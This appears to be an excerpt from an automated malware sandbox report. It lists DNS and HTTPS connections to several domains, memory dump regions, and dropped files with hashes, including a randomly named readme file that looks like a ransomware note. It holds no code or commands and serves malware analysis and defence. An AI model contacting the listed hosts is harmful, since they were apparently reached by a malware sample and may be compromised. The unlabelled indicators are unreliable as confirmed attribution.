US 172.67.128.214:443 heliomotion.com tcp
US 172.67.128.214:443 heliomotion.com tcp
US 8.8.8.8:53 romeguidedvisit.com udp
NL 35.214.139.14:443 romeguidedvisit.com tcp
NL 35.214.139.14:443 romeguidedvisit.com tcp
US 8.8.8.8:53 pcprofessor.com udp
US 184.170.246.76:443 pcprofessor.com tcp
US 184.170.246.76:443 pcprofessor.com tcp
US 8.8.8.8:53 ccpbroadband.com udp
US 35.208.237.11:443 ccpbroadband.com tcp
US 35.212.37.164:443 ccpbroadband.com tcp
US 35.208.237.11:443 ccpbroadband.com tcp

Files

memory/1600-2-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-16-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-14-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-12-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-10-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-8-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-6-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-4-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-1-0x0000000000240000-0x0000000000260000-memory.dmp

memory/1600-18-0x0000000000240000-0x0000000000260000-memory.dmp

memory/2940-23-0x000007FEF602E000-0x000007FEF602F000-memory.dmp

memory/2940-25-0x0000000002340000-0x0000000002348000-memory.dmp

memory/2940-24-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2940-30-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/2940-29-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/2940-28-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/2940-27-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/2940-26-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/2940-31-0x000007FEF5D70000-0x000007FEF670D000-memory.dmp

memory/1600-32-0x0000000000240000-0x0000000000260000-memory.dmp

C:\Users\hoc5p0yrb-readme.txt

MD5 f0b831ac96514a4f2bcbf0a9f01af675
SHA1 e7a630da9ee1d8963435208f534bf52c93f86601
SHA256 962a8428138b6056cfa56fd917287332a95495c8dabfd048c475a582b1f09c19
SHA512 4f37c052db6f67781f6804512331fd3c728c32f258f94c82f321ee591c6c631d74b36291b9178ea7fad0958ab7d581e68fd942b8c7936ee61f4a7c433082c62f

memory/1600-165-0x0000000000400000-0x0000000000454000-memory.dmp

memory/1600-519-0x0000000000240000-0x0000000000260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCBAA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCBCC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Windows\System32\catroot2\dberr.txt

MD5 ea33b6d8114f9afda771d14f7e83b842
SHA1 386b8a909eee9310c2d0508c8c27aa7f4a14a1d9
SHA256 d5a85e43659ee0e018a6e264485c31d6ad838089ad598093f1a146528a1d98bf
SHA512 6a209aa565e1ac779e86e4ede21288207a0d2c471ea8d41c3888e42ed34611f35dd35622b7a58fbd0ced3eb89ee42da2e627eb9d66f57c04e534e930f4f13e8b